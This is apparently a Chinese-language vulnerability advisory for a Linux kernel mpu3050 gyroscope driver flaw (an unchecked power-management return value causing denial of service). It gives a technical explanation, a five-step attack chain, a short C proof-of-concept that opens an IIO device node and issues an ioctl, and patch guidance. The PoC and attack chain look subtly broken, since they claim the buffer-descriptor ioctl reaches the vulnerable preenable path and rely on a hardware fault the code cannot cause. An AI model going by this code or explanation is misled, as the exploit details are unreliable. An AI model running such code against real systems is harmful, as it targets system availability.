CVE-2026-43357 Linux内核mpu3050驱动错误处理漏洞

漏洞信息

漏洞编号

CVE-2026-43357

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的mpu3050陀螺仪驱动程序存在一个安全漏洞，该漏洞源于对电源管理函数返回值的检查缺失。在设备尝试从低功耗状态唤醒时，驱动程序未能正确处理唤醒失败的情况，导致可能访问不可用的硬件资源。由于设备使用计数被错误地递增，这可能进一步导致资源管理混乱。本地低权限攻击者利用此漏洞可触发系统不稳定，导致拒绝服务。

技术细节

该漏洞位于Linux内核的`drivers/iio/gyro/mpu3050-core.c`驱动文件中，涉及电源管理运行时（PM Runtime）的逻辑缺陷。具体而言，代码中调用了`pm_runtime_get_sync()`函数来唤醒设备，但未对返回值进行校验。当硬件设备由于某种原因（如总线错误或电源故障）无法从低功耗状态恢复时，该函数会返回负数错误码，但驱动程序忽略了这一错误，继续执行后续的硬件访问操作。这会导致对未就绪的硬件进行读写，从而引发系统崩溃或不可预测的行为。此外，`pm_runtime_get_sync()`的一个特性是无论操作成功与否，都会增加设备的usage count。在唤醒失败的场景下，这会导致引用计数泄漏，使得设备永远无法再次进入休眠状态，造成资源耗尽。漏洞修复采用了`pm_runtime_resume_and_get()`函数，该函数仅在唤醒成功时增加计数，并在失败时返回错误，从而解决了两个问题。同时，修复还在`preenable`失败路径中增加了`pm_runtime_put_autosuspend()`调用，确保资源正确释放。

攻击链分析

STEP 1

步骤1

攻击者获得本地系统的低权限用户访问权限。

STEP 2

步骤2

攻击者识别目标系统运行的是存在漏洞的Linux内核版本，并且加载了mpu3050驱动模块。

STEP 3

步骤3

攻击者打开对应的IIO设备节点（如 /dev/iio:deviceX）。

STEP 4

步骤4

攻击者通过ioctl等系统调用触发设备的缓冲区启用操作，进而调用驱动中的preenable函数。

STEP 5

步骤5

如果此时硬件因故障无法唤醒，由于缺少错误检查，驱动继续访问硬件导致系统崩溃或资源耗尽（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual Proof of Concept for CVE-2026-43357
 * This code attempts to trigger the vulnerable code path in the mpu3050 driver.
 * It requires a system with the vulnerable kernel version and the mpu3050 hardware present.
 * Compile: gcc poc.c -o poc
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>

// Define the ioctl command to enable the buffer (triggering preenable)
// The actual magic number may vary depending on kernel configuration
#define IIO_BUFFER_GET_FD_IOCTL _IOWR('i', 0x91, int)

int main() {
    const char *device_path = "/dev/iio:device0"; // Common path for IIO devices
    int fd = -1;
    int buffer_fd = -1;
    int ret;

    printf("[*] Attempting to open %s...\n", device_path);
    fd = open(device_path, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        printf("[-] Hint: The device may not exist or you may lack permissions.\n");
        return 1;
    }

    printf("[+] Device opened successfully.\n");
    printf("[*] Attempting to trigger buffer enable (preenable path)...\n");

    // This ioctl triggers the buffer setup sequence.
    // Inside the kernel, this calls iio_buffer_enable(), then preenable().
    // preenable() calls pm_runtime_get_sync() without checking the return value.
    ret = ioctl(fd, IIO_BUFFER_GET_FD_IOCTL, &buffer_fd);

    if (ret < 0) {
        perror("[-] ioctl failed");
        // Failure is expected if hardware is not physically present or simulating fault
        printf("[*] If the kernel crashes here or behaves erratically, the vulnerability is triggered.\n");
    } else {
        printf("[+] ioctl succeeded. Buffer FD: %d\n", buffer_fd);
        close(buffer_fd);
    }

    close(fd);
    printf("[*] PoC execution finished.\n");
    return 0;
}

影响范围

Linux Kernel (stable branches containing mpu3050-core.c prior to commits 2a86a39, 35f54e7, 42685cf, 66c0d1d, 7a3dec5)

防御指南

临时缓解措施

建议用户尽快应用内核补丁。对于无法立即更新的系统，可以通过阻止相关内核模块的加载来缓解风险，确保普通用户无法访问IIO设备节点。